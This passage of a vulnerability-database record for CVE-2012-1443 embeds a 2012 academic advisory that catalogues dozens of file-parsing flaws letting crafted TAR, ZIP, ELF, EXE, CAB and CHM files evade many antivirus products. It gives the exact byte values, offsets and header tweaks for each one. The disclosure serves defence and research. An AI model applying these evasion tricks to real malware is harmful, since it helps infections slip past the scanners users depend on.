detection via a RAR file with an initial MZ character sequence.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations. Multiple products RAR A file parser contains a vulnerability that can prevent malware detection. Different RAR If it is announced that there is also a problem with the parser implementation, this vulnerability can be CVE May be split.By the attacker, MZ Has a character sequence starting with RAR Malware detection may be avoided via files. \nSuccessful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. Sophos Anti-Virus is a set of anti-virus software for various operating systems from Sophos, UK. The software detects and removes viruses, spyware, trojans and worms in real time, ensuring comprehensive network protection for desktops and laptops. Multiple file-parsing vulnerabilities leading to evasion in different antivirus(AV) products. All \naffected products are command-line versions of \nthe AVs. \n\n----------------------------\nVulnerability Descriptions\n----------------------------\n\n1. Specially crafted infected POSIX TAR files with \"[aliases]\" as first 9 bytes \n   evades detection. \n\n   Affected products -\n   ClamAV 0.96.4, CAT-QuickHeal 11.00\n  \n   CVE no - \n   CVE-2012-1419\n\n2. Specially crafted infected POSIX TAR files with \"\\7fELF\" as first 4 bytes \n   evades detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, \n   Fortinent 4.2.254.0, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, \n   Microsoft 1.6402, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, \n   Rising 22.83.00.03\n\n   CVE no - \n   CVE-2012-1420\n\n3. Specially crafted infected POSIX TAR files with \"MSCF\" as first 4 bytes \n   evades detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, Norman 6.06.12, Rising 22.83.00.03, \n   Symantec 20101.3.0.103\n\n   CVE no - \n   CVE-2012-1421\n\n4. Specially crafted infected POSIX TAR files with \"ITSF\" as first 4 bytes \n   evades detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03\n\n   CVE no - \n   CVE-2012-1422\n\n5. Specially crafted infected POSIX TAR files with \"MZ\" as first 2 bytes \n   evades detection. \n\n   Affected products -\n   Command 5.2.11.5, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, Fortinent 4.2.254.0, \n   Ikarus T3.1.1.97.0, K7AntiVirus 9.77.3565, NOD32 5795, Norman 6.06.12, \n   PCTools 7.0.3.5, Rising 22.83.00.03, VirusBuster 13.6.151.0\n\n   CVE no - \n   CVE-2012-1423\n\n6. Specially crafted infected POSIX TAR files with \"\\19\\04\\00\\10\" at offset 8\n   evades detection. \n\n   Affected products -\n   Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Jiangmin 13.0.900, Norman 6.06.12, \n   PCTools 7.0.3.5, Sophos 4.61.0\n\n   CVE no - \n   CVE-2012-1424\n\n\n7. Specially crafted infected POSIX TAR files with \"\\50\\4B\\03\\04\" as the first\n   4 bytes evades detection. \n\n   Affected products -\n   AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Emsisoft 5.1.0.1,\n   Fortinet 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, \n   Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, \n   NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Symantec 20101.3.0.103, \n   TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004 \n\n   CVE no - \n   CVE-2012-1425\n\n8. Specially crafted infected POSIX TAR files with \"\\42\\5A\\68\" as the first\n   3 bytes evades detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, \n   K7AntiVirus 9.77.3565, Norman 6.06.12, Rising 22.83.00.03\n\n   CVE no - \n   CVE-2012-1426\n\n\n9. Specially crafted infected POSIX TAR files with \"\\57\\69\\6E\\5A\\69\\70\" at \n   offset 29 evades detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0\n\n   CVE no - \n   CVE-2012-1427\n\n10. Specially crafted infected POSIX TAR files with \"\\4a\\46\\49\\46\" at offset 6\n   evades detection. \n   \n   Affected products -\n   CAT-QuickHeal 11.00,  Norman 6.06.12, Sophos 4.61.0\n\n   CVE no - \n   CVE-2012-1428\n\n11. Specially crafted infected ELF files with \"ustar\" at offset 257\n   evades detection. \n\n   Affected products -\n   BitDefender 7.2, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n   F-Secure 9.0.16160.0, Ikarus T3.1.1.97.0, McAfee 5.400.0.1158, \n   McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01 \n\n   CVE no - \n   CVE-2012-1429\n12. Specially crafted infected ELF files with \"\\19\\04\\00\\10\" at offset 8 evades\n   detection. \n\n   Affected products -\n   BitDefender 7.2, Comodo 7424, eSafe 7.0.17.0, F-Secure 9.0.16160.0, \n   McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, \n   Sophos 4.61.0, Rising 22.83.00.03\n\n   CVE no - \n   CVE-2012-1430\n13. Specially crafted infected ELF files with \"\\4a\\46\\49\\46\" at offset 6 evades\n   detection. \n\n   Affected products -\n   BitDefender 7.2, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, \n   F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee-GW-Edition 2010.1C, \n   nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03\n\n   CVE no - \n   CVE-2012-1431\n\n14. Specially crafted infected MS EXE files with \"\\57\\69\\6E\\5A\\69\\70\" at offset\n   29 evades detection. \n\n   Affected products -\n   Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1432\n\n15. Specially crafted infected MS EXE files with \"\\4a\\46\\49\\46\" at offset\n   6 evades detection. \n\n   Affected products -\n   AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n   Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1433\n\n16. Specially crafted infected MS EXE files with \"\\19\\04\\00\\10\" at offset\n   8 evades detection. \n\n   Affected products -\n   AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, \n   Panda 10.0.2.7\n   \n   CVE no - \n   CVE-2012-1434\n\n17. Specially crafted infected MS EXE files with \"\\50\\4B\\4C\\49\\54\\45\" at \n   offset 30 evades detection. \n   \n   Affected products - \n   AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n   Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1435\n\n18. Specially crafted infected MS EXE files with \"\\2D\\6C\\68\" at \n   offset 2 evades detection. \n \n   Affected products - \n   AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n   Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1436\n\n19. Specially crafted infected MS Office files with \"\\50\\4B\\53\\70\\58\" at \n   offset 526 evades detection. \n   \n   Affected products - \n   Comodo 7425\n   \n   CVE no - \n   CVE-2012-1437\n\n20. Specially crafted infected MS Office files with \"ustar\" at \n   offset 257 evades detection. \n\n   Affected products - \n   Comodo 7425, Sophos 4.61.0 \n\n   CVE no - \n   CVE-2012-1438\n\n21. 'padding' field in ELF files is parsed incorrectly. \n    If an infected ELF file's padding field is incremented by 1 it evades\n    detection.    \n\n   Affected products - \n   eSafe 7.0.17.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1439\n\n22. 'identsize' field in ELF files is parsed incorrectly. \n    If an infected ELF file's identsize field is incremented by 1 it evades\n    detection.    \n\n   Affected products - \n   Norman 6.06.12, eSafe 7.0.17.0, eTrust-Vet 36.1.8511, Fortinet 4.2.254.0, \n   Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1440\n\n23. 'e_ip' and 'e_res' field in MS EXE files are parsed incorrectly.  \n    If any of these fields in an infected MS EXE file is incremented by 1 \n    it evades detection.    \n\n   Affected products - \n   Prevx 3.0\n\n   'e_minalloc', 'e_res2','e_cparhdr', 'e_crlc', 'e_lfarlc','e_maxalloc',\n    'e_oeminfo', 'e_ovno', 'e_cs', 'e_csum','e_sp', 'e_ss', 'e_cblp' and \n    'e_oemid' fields in MS EXE files are parsed incorrectly.  \n    If any of these fields in an infected MS EXE file is incremented by 1 \n    it evades detection.    \n\n   Affected products - \n   eSafe 7.0.017.0, Prevx 3.0\n\n\n   CVE no - \n   CVE-2012-1441\n\n24. 'class' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's class field is incremented by 1 it evades\n    detection. \n\n   Affected products - \n   CAT-QuickHeal 11.00, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, \n   eSafe 7.0.017.0, Kaspersky 7.0.0.125, F-Secure 9.0.16160.0, \n   Sophos 4.61.0, Antiy-AVL 2.0.3.7, Rising 22.83.00.03, Fortinet 4.2.254.0, \n   Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1442\n\n25. Infected RAR files with initial two bytes set to 'MZ' can be fixed by the \n    user and correctly extracted. Such a file evades detection.  \n    \n   Affected products -\n   ClamAV 0.96.4, Rising 22.83.00.03, CAT-QuickHeal 11.00, GData 21, \n   Symantec 20101.3.0.103, Command 5.2.11.5, Ikarus T3.1.1.97.0, \n   Emsisoft 5.1.0.1, PCTools 7.0.3.5, F-Prot 4.6.2.117, \n   VirusBuster 13.6.151.0, Fortinent 4.2.254.0, Antiy-AVL 2.0.3.7, \n   K7AntiVirus 9.77.3565, TrendMicro-HouseCall 9.120.0.1004,Kaspersky 7.0.0.125 \n   Jiangmin 13.0.900. Microsoft 1.6402, Sophos 4.61.0, NOD32 5795, AntiVir 7.11.1.163, \n   Norman 6.06.12, McAfee 5.400.0.1158, Panda 10.0.2.7, McAfee-GW-Edition 2010.1C, \n   TrendMicro 9.120.0.1004, Comodo 7424, BitDefender 7.2, eSafe 7.0.17.0, F-Secure 9.0.16160.0\n   nProtect 2011-01-17.01, AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, Avast 4.8.1351.0, \n   Avast5 5.0.677.0, VBA32 3.12.14.2   \n\n   CVE no - \n   CVE-2012-1443\n\n26. 'abiversion' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's abiversion field is incremented by 1 it evades\n    detection. \n\n   Affected products - \n   eSafe 7.0.017.0, Prevx 3.0, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1444\n\n27. 'abi' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's abi field is incremented by 1 it evades\n    detection. \n\n   Affected products - \n   eSafe 7.0.017.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1445\n\n28. 'encoding' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's encoding field is incremented by 1 it evades\n    detection. \n\n   Affected products - \n   CAT-QuickHeal 11.00, McAfee 5.400.0.1158, Symantec 20101.3.0.103, \n   Norman 6.06.12, eSafe 7.0.017.0, Kaspersky 7.0.0.125, \n   McAfee-GW-Edition 2010.1C, Sophos 4.61.0, eTrust-Vet 36.1.8511, \n   Antiy-AVL 2.0.3.7, PCTools 7.0.3.5, Rising 22.83.00.03, Fortinet 4.2.254.0,\n   Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1446\n\n29. 'e_version' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's e_version field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n    Fortinet 4.2.254.0, eSafe 7.0.017.0, DrWeb 5.0.2.03300, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1447\n\n30. 'cbCabinet' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's cbCabinet field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, TrendMicro 9.120.0.1004, Ikarus T3.1.1.97.0\n   TrendMicro-HouseCall 9.120.0.1004, Emsisoft 5.1.0.1 \n\n   CVE no - \n   CVE-2012-1448\n\n31. 'vMajor' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's vMajor field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   NOD32 5795, Rising 22.83.00.03\n   \n   CVE no - \n   CVE-2012-1449\n\n32. 'reserved3' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's reserved field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   Emsisoft 5.1.0.1, Sophos 4.61.0, Ikarus T3.1.1.97.0\n   \n   CVE no - \n   CVE-2012-1450\n\n33. 'reserved2' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's reserved2 field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0\n   \n   CVE no - \n   CVE-2012-1451\n\n34. 'reserved1' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's reserved field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, CAT-QuickHeal 11.00\n   \n   CVE no - \n   CVE-2012-1452\n\n35. 'coffFiles' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's coffFiles field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   McAfee 5.0.2.03300, TrendMicro-HouseCall 9.120.0.1004, Kaspersky 7.0.0.125, \n   Sophos 4.61.0, TrendMicro 9.120.0.1004, McAfee-GW-Edition 2010.1C,\n   Emsisoft 5.1.0.1, eTrust-Vet 36.1.8511, Antiy-AVL 2.0.3.7, Microsoft 1.6402,\n   Rising 22.83.00.03, Ikarus T3.1.1.97.0, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1453\n\n36. 'ei_version' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's version field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   McAfee 5.0.02.03300, eSafe 7.0.17.0, McAfee-GW-Edition 2010.1C, \n   Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1454\n\n37. 'vMinor' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's version field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   NOD32 5795, Rising 22.83.00.03\n \n   CVE no - \n   CVE-2012-1455\n\n38. A specially crafted ZIP file, created by concatenating the contents \n   of a clean TAR archive and a virus-infected ZIP archive, is parsed \n   incorrectly and evades detection. \n\n   Affected products -\n   AVG 10.0.0.1190, CAT-QuickHeal 11.00, Comodo 7424, Emsisoft 5.1.0.1,\n   eSafe 7.0.17.0, F-Prot 4.6.2.117,Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, \n   Jiangmin 13.0.900, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, \n   McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, \n   Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, \n   TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004\n\n   CVE no - \n   CVE-2012-1456\n\n39. If the length field in the header of a file with test EICAR virus\n   included into a TAR archive is set to be greater than the archive's total \n   length (1,000,000+original length in our experiments), the antivirus \n   declares the file to be clean but virus gets extracted correctly by the \n   GNU tar program. \n\n   Affected products -\n   AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, Avast5 5.0.677.0, \n   AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, \n   Command 5.2.11.5, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117, \n   GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, \n   Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, \n   Microsoft 1.6402, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, \n   Rising 22.83.00.03, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, \n   TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0 \n\n   CVE no - \n   CVE-2012-1457\n\n40. A Windows Compiled HTML Help (CHM) file is a set of HTML files,\n   scripts, and images compressed using the LZX algorithm. \n   For faster random accesses, the algorithm is reset at intervals\n   instead of compressing the entire file as a single stream. The\n   length of each interval is specified in the LZXC header. \n\n   If an infected CHM file's header modified so that the reset interval\n   is lower than in the original file, the antivirus declares the file\n   to be clean. But the Windows CHM viewer hh.exe correctly decompresses\n   the infected content located before the tampered header. \n\n   Affected products -\n   ClamAV 0.96.4, Sophos 4.61.0 \n\n   CVE no - \n   CVE-2012-1458\n\n41. In a POSIX TAR archive, each member file has a 512-byte header protected\n   by a simple checksum. Every header also contains a file length field, which\n   is used by the extractor to locate the next header in the archive. \n\n   If a TAR archive contains two files: the first one is clean, while\n   the second is infected with test EICAR virus - and it is modified such that \n   the length field in the header of the first, clean file to point into the \n   middle of the header of the second, infected file. The antivirus declares \n   the file to be clean but virus gets extracted correctly by the \n   GNU tar program. If an infected tar.gz archive is appended 6 random bytes at the end, \n    the antivirus declares the file to be clean but virus gets extracted by\n    the gunzip+tar programs correctly by ignoring these bytes. \n\n   Affected products -\n   Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Command 5.2.11.5, \n   eSafe 7.0.17.0, F-Prot 4.6.2.117, Jiangmin 13.0.900, \n   K7AntiVirus 9.77.3565, VBA32 3.12.14.2 \n   \n   CVE no - \n   CVE-2012-1460\n\n43. GZIP files can contain multiple compressed streams, which are assembled\n    when the contents are extracted. If an infected .tar.gz file is broken \n    into two streams, the antivirus declares the infected .tar.gz file to \n    be clean while tar+gunzip extract the virus correctly\n\n   Affected products -\n   AVG 10.0.0.1190, BitDefender 7.2, Command 5.2.11.5, Emsisoft 5.1.0.1, \n   F-Secure 9.0.16160.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, \n   Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, \n   McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, \n   Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, \n   TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2 \n\n   CVE no - \n   CVE-2012-1461\n\n44. If an infected ZIP archive is prepended with 1024 random bytes at the \n   beginning, the antivirus declares the file to be clean but virus gets extracted\n   by the unzip program correctly by skipping these bytes\n\n   Affected products -\n   AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, CAT-QuickHeal 11.00, \n   Emsisoft 5.1.0.1, eSafe 7.0.17.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, \n   Jiangmin 13.0.900, Kaspersky 7.0.0.125, Norman 6.06.12, Sophos 4.61.0, \n   Symantec 20101.3.0.103 \n\n   CVE no - \n   CVE-2012-1462\n\n45. In most ELF files, the 5th byte of the header indicates endianness: 01\n   for little-endian, 02 for bigendian. Linux kernel, however, does not\n   check this field before loading an ELF file. If an infected ELF file's 5-th \n   byte is set to 02, the antivirus declares the file to be clean but the ELF \n   file gets executed correctly. \n\n   Affected products -\n   AhnLab-V3 2011.01.18.00, BitDefender 7.2, CAT-QuickHeal 11.00, Command 5.2.11.5, \n   Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, \n   McAfee 5.400.0.1158, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7 \n\n   CVE no - \n   CVE-2012-1463\n\n--------\nCredits\n--------\nVulnerabilities found and advisory written by Suman Jana and Vitaly Shmatikov. \n\n-----------\nReferences\n-----------\n\"Abusing File Processing in Malware Detectors for Fun and Profit\" by Suman Jana and Vitaly Shmatikov\nTo appear in IEEE Symposium on Security and Privacy 2012\nhttp://www.ieee-security.org/TC/SP2012/ \n",
      sources: [
         {
            db: "NVD",
            id: "CVE-2012-1443",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
         {
            db: "BID",
            id: "52612",
         },
         {
            db: "VULHUB",
            id: "VHN-54724",
         },
         {
            db: "PACKETSTORM",
            id: "110990",
         },
      ],
      trust: 2.07,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2012-1443",
            trust: 2.9,
         },
         {
            db: "BID",
            id: "52612",
            trust: 1.4,
         },
         {
            db: "OSVDB",
            id: "80469",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80461",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80454",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80455",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80467",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80468",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80471",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80456",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80459",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80472",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80470",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80457",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80460",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80458",
            trust: 1.1,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001895",
            trust: 0.8,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-407",
            trust: 0.7,
         },
         {
            db: "BUGTRAQ",
            id: "20120319 EVASION ATTACKS EXPOLITING FILE-PARSING VULNERABILITIES IN ANTIVIRUS PRODUCTS",
            trust: 0.6,
         },
         {
            db: "NSFOCUS",
            id: "19198",
            trust: 0.6,
         },
         {
            db: "VULHUB",
            id: "VHN-54724",
            trust: 0.1,
         },
         {
            db: "PACKETSTORM",
            id: "110990",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54724",
         },
         {
            db: "BID",
            id: "52612",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
         {
            db: "PACKETSTORM",
            id: "110990",
         },
         {
            db: "NVD",
            id: "CVE-2012-1443",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-407",
         },
      ],
   },
   id: "VAR-201203-0367",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54724",
         },
      ],
      trust: 0.01,
   },
   last_update_date: "2023-12-18T12:10:12.911000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "AVL SDK",
            trust: 0.8,
            url: "http://www.antiy.net/en/avlsdk.html",
         },
         {
            title: "Command Antivirus",
            trust: 0.8,
            url: "http://www.authentium.com/command/csavdownload.html",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "https://www.avast.co.jp/index",
         },
         {
            title: "AVG Anti-Virus",
            trust: 0.8,
            url: "http://www.avgjapan.com/home-small-office-security/buy-antivirus",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.avira.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.rising-global.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.bitdefender.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.clamav.net/lang/en/",
         },
         {
            title: "Comodo Antivirus",
            trust: 0.8,
            url: "http://www.comodo.com/home/internet-security/antivirus.php",
         },
         {
            title: "Emsisoft Anti-Malware",
            trust: 0.8,
            url: "http://www.emsisoft.com/en/software/antimalware/",
         },
         {
            title: "ESET NOD32アンチウイルス",
            trust: 0.8,
            url: "http://www.eset.com/us/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.fortinet.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.f-prot.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.gdata.co.jp/",
         },
         {
            title: "IKARUS virus.utilities",
            trust: 0.8,
            url: "http://www.ikarus.at/en/ngo-gov/products/virus_utilities/index.html",
         },
         {
            title: "Jiangmin Antivirus",
            trust: 0.8,
            url: "http://global.jiangmin.com/",
         },
         {
            title: "K7 AntiVirus",
            trust: 0.8,
            url: "http://www.k7computing.com/en/product/k7-antivirusplus.php",
         },
         {
            title: "MacAfee Scan Engine",
            trust: 0.8,
            url: "http://www.mcafee.com/us/support/support-eol-scan-engine.aspx",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.norman.com/",
         },
         {
            title: "nProtect Anti-Virus",
            trust: 0.8,
            url: "http://global.nprotect.com/product/avs.php",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.ps-japan.co.jp/",
         },
         {
            title: "PC Tools AntiVirus",
            trust: 0.8,
            url: "http://www.pctools.com/jp/spyware-doctor-antivirus/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.quickheal.com/",
         },
         {
            title: "Endpoint Protection",
            trust: 0.8,
            url: "http://www.symantec.com/ja/jp/endpoint-protection",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://jp.trendmicro.com/jp/home/",
         },
         {
            title: "Trend Micro HouseCall",
            trust: 0.8,
            url: "http://jp.trendmicro.com/jp/tools/housecall/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://anti-virus.by/en",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.virusbuster.hu/en",
         },
         {
            title: "eSafe",
            trust: 0.8,
            url: "http://www.aladdin.co.jp/esafe/",
         },
         {
            title: "V3 Internet Security",
            trust: 0.8,
            url: "http://www.ahnlab.co.jp/product_service/product/b2b/v3is8.asp",
         },
         {
            title: "Kaspersky Anti-Virus",
            trust: 0.8,
            url: "http://www.kaspersky.com/kaspersky_anti-virus",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.sophos.com",
         },
         {
            title: "Microsoft Security Essentials",
            trust: 0.8,
            url: "http://windows.microsoft.com/ja-jp/windows/products/security-essentials",
         },
         {
            title: "McAfee Web Gateway",
            trust: 0.8,
            url: "http://www.mcafee.com/japan/products/web_gateway.asp",
         },
         {
            title: "F-Secure Anti-Virus",
            trust: 0.8,
            url: "http://www.f-secure.com/ja/web/home_jp/protection/anti-virus/overview",
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-264",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54724",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
         {
            db: "NVD",
            id: "CVE-2012-1443",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 1.7,
            url: "http://www.securityfocus.com/archive/1/522005",
         },
         {
            trust: 1.7,
            url: "http://www.ieee-security.org/tc/sp2012/program.html",
         },
         {
            trust: 1.1,
            url: "http://www.securityfocus.com/bid/52612",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80454",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80455",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80456",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80457",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80458",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80459",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80460",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80461",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80467",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80468",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80469",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80470",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80471",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80472",
         },
         {
            trust: 0.8,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1443",
         },
         {
            trust: 0.8,
            url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1443",
         },
         {
            trust: 0.6,
            url: "http://www.nsfocus.net/vulndb/19198",
         },
         {
            trust: 0.3,
            url: "http://seclists.org/bugtraq/2012/mar/88",
         },
         {
            trust: 0.1,
